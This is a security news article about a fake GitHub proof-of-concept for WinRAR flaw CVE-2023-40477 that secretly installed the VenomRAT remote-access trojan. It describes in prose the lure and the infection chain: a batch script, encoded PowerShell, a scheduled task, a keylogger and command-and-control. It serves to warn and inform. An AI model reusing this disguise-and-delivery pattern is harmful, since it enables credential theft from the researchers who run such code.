A malicious actor has been leveraging GitHub to disseminate a phony proof-of-concept (PoC) exploit for a recently patched vulnerability in the WinRAR software, CVE-2023-40477. This fake PoC, which was discovered by Palo Alto Networks' Unit 42 research team, was designed to infect users with the VenomRAT malware. The attacker, known as 'whalersplonk', uploaded the malicious code to GitHub on August 21, 2023. Although the attack is no longer active, it underscores the risks associated with downloading and running PoCs from GitHub without thoroughly vetting them for safety.
The CVE-2023-40477 vulnerability is an arbitrary code execution flaw that can be triggered when specially crafted RAR files are opened in versions of WinRAR prior to 6.23. The vulnerability was identified and reported to WinRAR by Trend Micro's Zero Day Initiative on June 8, 2023, but it was not publicly disclosed until August 17, 2023. WinRAR addressed the vulnerability in version 6.23, released on August 2.
The threat actor 'whalersplonk' moved swiftly to exploit this opportunity by distributing malware disguised as exploit code for the new WinRAR vulnerability. The malicious package was made to appear more legitimate by including a summary in the README file and a Streamable video demonstrating how to use the PoC. However, the Unit 42 team revealed that the bogus Python PoC script was actually a modified version of a publicly available exploit for a different vulnerability, CVE-2023-25157, a critical SQL injection flaw affecting GeoServer.
When run, the PoC does not execute the exploit as expected. Instead, it generates a batch script that downloads an encoded PowerShell script and runs it on the host system. This script then downloads the VenomRAT malware and creates a scheduled task to execute it every three minutes. Once VenomRAT is activated on a Windows device, it operates a key logger that records all keystrokes and stores them in a local text file. The malware then establishes a connection with the command and control (C2) server, from which it can receive a variety of commands to execute on the infected device.
Given that the malware can be used to deploy other payloads and steal credentials, anyone who ran this fake PoC should change their passwords for all accounts. The timeline of events shared by Unit 42 suggests that the threat actor set up the infrastructure and payload for the attack well before the public disclosure of the WinRAR vulnerability, and then waited for the right moment to craft a deceptive PoC. This suggests that the same attacker may use the heightened attention of the security community on newly revealed vulnerabilities to spread other misleading PoCs for various flaws in the future.
Fake PoCs on GitHub, which often target other criminals and security researchers, are a well-documented attack method. In late 2022, researchers discovered thousands of GitHub repositories promoting fraudulent PoC exploits for a range of vulnerabilities, many of which were deploying malware, malicious PowerShell scripts, hidden info-stealer downloaders, and Cobalt Strike droppers. More recently, in June 2023, attackers posing as cybersecurity researchers released several fake 0-day exploits targeting Linux and Windows systems with malware.